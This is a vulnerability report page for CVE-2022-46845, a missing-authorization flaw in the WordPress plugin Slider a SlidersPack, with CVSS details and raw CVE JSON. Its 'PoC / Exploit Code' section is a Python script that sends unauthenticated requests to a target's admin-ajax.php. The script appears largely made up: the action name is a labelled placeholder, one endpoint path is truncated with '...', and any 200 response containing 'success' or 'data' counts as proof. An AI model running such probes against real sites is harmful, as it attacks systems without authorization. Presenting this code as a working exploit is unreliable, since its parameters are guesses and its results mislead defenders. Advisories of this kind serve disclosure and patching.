Security Vulnerability Report
中文
CVE-2022-46845 CVSS 5.3 MEDIUM

CVE-2022-46845

Published: 2025-12-09 17:15:48
Last Modified: 2026-04-15 00:35:42

Description

Missing Authorization vulnerability in Essential Plugin Slider a SlidersPack allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Slider a SlidersPack: from n/a before 2.3.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Slider a SlidersPack < 2.3

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2022-46845 PoC - Slider a SlidersPack Access Control Bypass # Target: WordPress site with Slider a SlidersPack plugin < 2.3 import requests import sys def check_vulnerability(target_url): """ Check if the target is vulnerable to CVE-2022-46845 Missing Authorization in Slider a SlidersPack plugin """ # Target endpoints that may be affected endpoints = [ '/wp-admin/admin-ajax.php', '/wp-content/plugins/sliderspack-all-in-one-image-sliders/...', ] # Vulnerable parameters - plugin actions without authorization check vulnerable_params = { 'action': 'sliderspack_admin_action', # Example action 'sliderspack_nonce': '', # Missing or bypassable nonce } print(f"[*] Testing target: {target_url}") print(f"[*] Vulnerability: Missing Authorization (CVE-2022-46845)") # Test unauthenticated access to admin functions try: response = requests.post( f"{target_url}/wp-admin/admin-ajax.php", data=vulnerable_params, timeout=10 ) # Check if response indicates successful unauthorized access if response.status_code == 200: # Analyze response for signs of successful exploitation if 'success' in response.text or 'data' in response.text: print("[+] Target appears to be VULNERABLE") print(f"[+] Response: {response.text[:200]}") return True print("[-] Target does not appear to be vulnerable") return False except requests.exceptions.RequestException as e: print(f"[!] Error: {e}") return None if __name__ == "__main__": if len(sys.argv) > 1: target = sys.argv[1] check_vulnerability(target) else: print("Usage: python cve-2022-46845.py <target_url>") print("Example: python cve-2022-46845.py http://example.com")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2022-46845", "sourceIdentifier": "[email protected]", "published": "2025-12-09T17:15:47.613", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in Essential Plugin Slider a SlidersPack allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Slider a SlidersPack: from n/a before 2.3."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://vdp.patchstack.com/database/wordpress/plugin/sliderspack-all-in-one-image-sliders/vulnerability/wordpress-slider-a-sliderspack-image-slider-post-slider-acf-gallery-slider-plugin-2-0-2-broken-access-control?_s_id=cve", "source": "[email protected]"}]}}